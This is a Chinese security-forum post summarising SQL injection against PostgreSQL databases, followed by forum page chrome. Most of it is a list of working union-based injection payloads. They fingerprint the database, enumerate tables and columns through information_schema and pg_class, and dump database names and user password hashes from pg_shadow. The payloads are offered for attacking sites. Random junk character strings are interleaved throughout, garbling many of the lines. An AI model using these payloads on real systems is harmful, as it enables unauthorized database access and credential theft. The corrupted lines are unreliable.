找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2146|回复: 0
打印 上一主题 下一主题

postgreSQL注入总结

[复制链接]
抢楼 抢楼 本帖为抢楼帖,欢迎抢楼! 
跳转到指定楼层
楼主
发表于 2013-10-13 12:57:16 | 只看该作者 回帖奖励 |阅读模式
结合了MSSQL MySQL Oracle的一些特点
1 p' j) ~3 @- _

支持多语句执行,语句可以没有from

postgres用户是超级用户(创始人账户) 只有superuser有copy权限

注释: — , /**/, q4 C' n1 }2 a
连接符: %20 , + , /**/

内置函数:, u; Y& c; z8 S
current_database() //当前数据库名
6 U  c0 M3 l0 @/ Q6 Psession_user //会话用户" X3 q  G9 ^1 p  W" s
current_user //当前数据库用户
' J8 N+ z. ~+ v( h5 ruser //当前用户! W8 t" {3 ?1 ]3 u, _6 N
version() //数据库版本

Union注射:" W# i2 w- K4 b# F! M6 H" ]
order by n–9 G6 u5 ~* H7 G9 D! e) c4 r
and 1=2 union select null,null,null–
0 y. x4 O0 P- w6 E% [and 1=2 union select ‘beach’,null,null–
4 ^- s8 h( H  V1 x) |8 Y) Xand 1=2 union select (select version()),null,null–

获取表名,字段名(新版本利用information_schema):, F7 p& v7 b3 t9 Z- K' _- P) m: c( `
group_concat(table_name)
4 b+ Y' U: m6 N. p* t3 Nand 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–! K8 h8 e; v) T3 @
and 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–
9 w" S& h. b$ [; T2 q(老版本)& S% `4 s6 O3 U% n8 T
pg_class.oid对应pg_attribute.attrelid- H5 `. }% s, U! L
pg_class.relname表名$ ~5 f+ u' Q+ h4 n9 B
pg_attribute.attname字段名

select relname from pg_class获取表名: V+ X* y/ d" z6 h0 d3 w$ u
select oid from pg_class where 条件 获取参数" }& B. P: I& n
select attname from pg_attribute where attrelid=’oid的值’ 获取字段名

实战:
4 O2 U, G8 d  U7 gand 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表$ K- r' Z4 |0 ^6 `( Z* S5 z
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–4 ?) ~: j5 b3 Y; u7 o$ r
由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136

and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名5 O) \  f. V6 c+ A/ ~: Q
======================================================================
+ f5 `+ S; {8 K9 |' ^- V& oand 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库
* a4 D7 `! v$ r1 l% R, Iand 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表